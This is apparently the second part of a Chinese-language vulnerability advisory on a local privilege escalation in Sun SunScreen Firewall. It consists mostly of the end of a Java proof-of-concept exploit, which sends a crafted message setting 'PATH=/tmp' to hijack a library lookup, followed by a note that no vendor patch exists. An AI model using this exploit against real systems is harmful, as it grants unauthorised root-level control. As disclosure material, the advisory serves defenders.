Sun SunScreen Firewall本地权限提升漏洞(2)

dos.writeUTF("0xtest");
    dos.writeByte(3);
    dos.writeByte(1);
    dos.writeByte(1);
    dos.writeByte(1);
    dos.writeInt(3);
    dos.writeInt(0);
    dos.writeInt(0);
      
    dos.writeUTF("PATH=/tmp");
    dos.writeUTF("lib/screenname");

dos.writeUTF("admin1");
   
    str = dis.readLine();
    System.out.println(str);   
   
    str = dis.readLine();
    System.out.println(str);
   
    dis.close();
    dos.close();
    s1.close();
    } catch (ConnectException connExc) {
    System.err.println("Could not connect to the server.");
    } catch (IOException e) {
    // foo
    }
    }
    }

建议:
--------------------------------------------------------------------------------
厂商补丁:

Sun
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwsgyy.html